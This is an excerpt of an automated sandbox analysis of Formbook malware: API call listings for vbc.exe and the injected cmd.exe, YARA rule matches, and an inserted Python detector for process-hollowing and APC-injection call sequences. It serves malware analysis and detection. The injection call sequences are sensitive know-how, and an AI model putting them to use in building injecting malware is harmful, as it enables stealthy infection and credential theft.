Source: C:\Users\Public\vbc.exe; Code function: 7_2_00A2FC90 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe; Code function: 7_2_00A2FC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe; Code function: 7_2_00A2FD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe; Code function: 7_2_00A2FDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe; Code function: 7_2_00A2FEA0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe; Code function: 7_2_00A2FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe; Code function: 7_2_00A2FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A30060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A301D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A307AC NtCreateMutant,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A30C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A310D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A31148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A31930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A31D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A571E5F SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A56F6CF NtSetInformationProcess,GetFileAttributesW,_get_osfhandle,SetEndOfFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55C2A6 NtQueryInformationToken,GetCPInfo,NtQueryInformationToken,GetCPInfo,NtQueryInformationToken,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55C48A GetCPInfo,NtOpenThreadToken,NtOpenProcessToken,GetCPInfo,NtClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A5618A6 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,NtSetInformationProcess,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55C52D NtQueryInformationToken,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022900C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022907AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02290060 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02290078 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02290048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0229010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022901D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02290C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022910D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02291148 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FAB8 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FAD0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02291930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02291D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00099D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00099E10 NtReadFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00099E90 NtClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00099E0A NtReadFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00099E8F NtClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55A902: CreateFileW,DeviceIoControl,memcpy,CloseHandle,FindFirstStreamW,FindNextStreamW,FindClose,
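The resolved Nt* calls listed above for vbc.exe (7_2) and the code it later runs inside cmd.exe (9_2) are the primitives of two injection techniques: process hollowing (NtCreateProcessEx, NtUnmapViewOfSection, NtCreateSection/NtMapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, NtResumeThread) and APC injection (NtOpenProcess, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtQueueApcThread). The following is an added example, not Joe Sandbox code, of how a sandbox or EDR API trace can be matched against those sequences. The trace it runs on is constructed by hand from the call names in this report; the call order, the pids and the absence of arguments are assumptions, not recorded data.

```python
"""Flag process-injection call sequences in a per-process Nt* API trace.

Added example for this report, not Joe Sandbox code. TRACE is constructed from
the call names the sandbox resolved in vbc.exe (7) and cmd.exe (9); the order
and the pids are assumed, and a real trace would also carry timestamps, the
target process handle and the NTSTATUS of each call.
"""
from collections import defaultdict

TRACE = [  # constructed: (pid, api)
    (7, "NtCreateProcessEx"),      # child created, assumed suspended
    (7, "NtUnmapViewOfSection"),   # original image unmapped from the child
    (7, "NtCreateSection"),
    (7, "NtMapViewOfSection"),     # payload section mapped into the child
    (7, "NtWriteVirtualMemory"),
    (7, "NtGetContextThread"),
    (7, "NtSetContextThread"),     # entry point redirected into the payload
    (7, "NtResumeThread"),
    (9, "NtOpenProcess"),
    (9, "NtAllocateVirtualMemory"),
    (9, "NtWriteVirtualMemory"),
    (9, "NtQueueApcThread"),       # APC queued in another process
    (9, "NtResumeThread"),
    (4, "NtCreateFile"),           # benign control: plain file I/O
    (4, "NtReadFile"),
    (4, "NtClose"),
]

# Each technique is an ordered list of call sets: a process matches when one
# call from each set appears in that order, with anything in between.
PATTERNS = {
    "process_hollowing": [
        {"NtCreateProcessEx", "NtCreateUserProcess"},
        {"NtUnmapViewOfSection"},
        {"NtMapViewOfSection", "NtWriteVirtualMemory"},
        {"NtSetContextThread"},
        {"NtResumeThread"},
    ],
    "apc_injection": [
        {"NtOpenProcess"},
        {"NtAllocateVirtualMemory", "NtMapViewOfSection"},
        {"NtWriteVirtualMemory", "NtMapViewOfSection"},
        {"NtQueueApcThread"},
    ],
}

def match_sequence(calls, pattern):
    """True if `calls` contains one member of each step of `pattern`, in order,
    as a (possibly non-contiguous) subsequence."""
    step = 0
    for api in calls:
        if step < len(pattern) and api in pattern[step]:
            step += 1
    return step == len(pattern)

def detect(trace):
    """Group the trace by pid and return {pid: [matched technique names]}."""
    per_pid = defaultdict(list)
    for pid, api in trace:
        per_pid[pid].append(api)
    hits = {}
    for pid, calls in per_pid.items():
        matched = sorted(name for name, pat in PATTERNS.items()
                         if match_sequence(calls, pat))
        if matched:
            hits[pid] = matched
    return hits

if __name__ == "__main__":
    for pid, techniques in detect(TRACE).items():
        print(f"pid {pid}: {', '.join(techniques)}")
```

Order-only matching is deliberately coarse: debuggers, the .NET runtime and some installers also call NtMapViewOfSection or NtSetContextThread, so a production rule should additionally require that the handle passed to NtUnmapViewOfSection, NtWriteVirtualMemory or NtQueueApcThread belongs to a different process than the caller, which is the context the sandbox uses for its own injection verdicts.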
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00035247
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00035A63
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00381E00
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0038A118
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003872B2
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003872C0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00381B88
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00381B82
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00385D70
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00385D60
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00381DF4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00035247
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00035A63
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041E87B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402D88
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00409E40
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00409E3B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041DFAF
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3E0C6
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3E2E9
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AE63BF
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A663DB
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A42305
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A8A37B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AC443E
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AC05E3
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A5C5F0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A86540
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A44680
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4E6C1
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AE2622
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A8A634
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4C7BC
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A6286D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4C85C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A429B2
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AE098E
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AD49F5
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A569FE
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A8C920
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AECBA4
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AC6BCB
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AE2C9C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ACAC5E
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A70D3B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4CD5B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A72E2F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A5EE4C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ADCFB1
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AB2FDC
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A50F3F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A6D005
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ABD06D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A43040
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A5905A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ACD13F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AE1238
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3F3CF
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A47353
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A75485
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A51489
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A7D47D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AE35DA
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4351F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AC579A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A757C3
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AD771D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ADF8EE
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ABF8C4
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AC394B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AC5955
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AF3A83
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FBD7
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ACDBDA
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A67B00
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ADFDDD
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ACBF14
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A6DF7C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55B210
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A5612D2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55276A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55E46C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A5639B6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0229E2E9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022A2305
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022EA37B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_023463BF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022C63DB
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0229E0C6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02342622
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022EA634
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022A4680
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022AE6C1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022AC7BC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0232443E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022E6540
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_023205E3
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022BC5F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0234CBA4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02326BCB
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022C286D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022AC85C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022EC920
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022A29B2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0234098E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_023349F5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022B69FE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022D2E2F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022BEE4C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022B0F3F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0233CFB1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02312FDC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0232AC5E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02342C9C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022D0D3B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022ACD5B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02341238
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022A7353
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0229F3CF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022CD005
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0231D06D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022A3040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022B905A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0232D13F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0233771D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0232579A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022D57C3
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022DD47D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022B1489
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022D5485
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022A351F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_023435DA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02353A83
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022C7B00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0232DBDA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0229FBD7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0233F8EE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0231F8C4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02325955
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0232394B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0232BF14
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022CDF7C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0233FDDD
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00082D88
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00082D90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00089E3B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00089E40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0009DFAF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00082FB0
          Source: Request for quotation.xlsx | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Users\Public\vbc.exeCode function: String function: 00A8373B appears 253 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00A83F92 appears 132 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00A3E2A8 appears 60 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00AAF970 appears 84 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00A3DF5C appears 137 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 0229DF5C appears 137 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 022E3F92 appears 132 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 022E373B appears 253 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 0229E2A8 appears 60 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 0230F970 appears 84 times
          Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
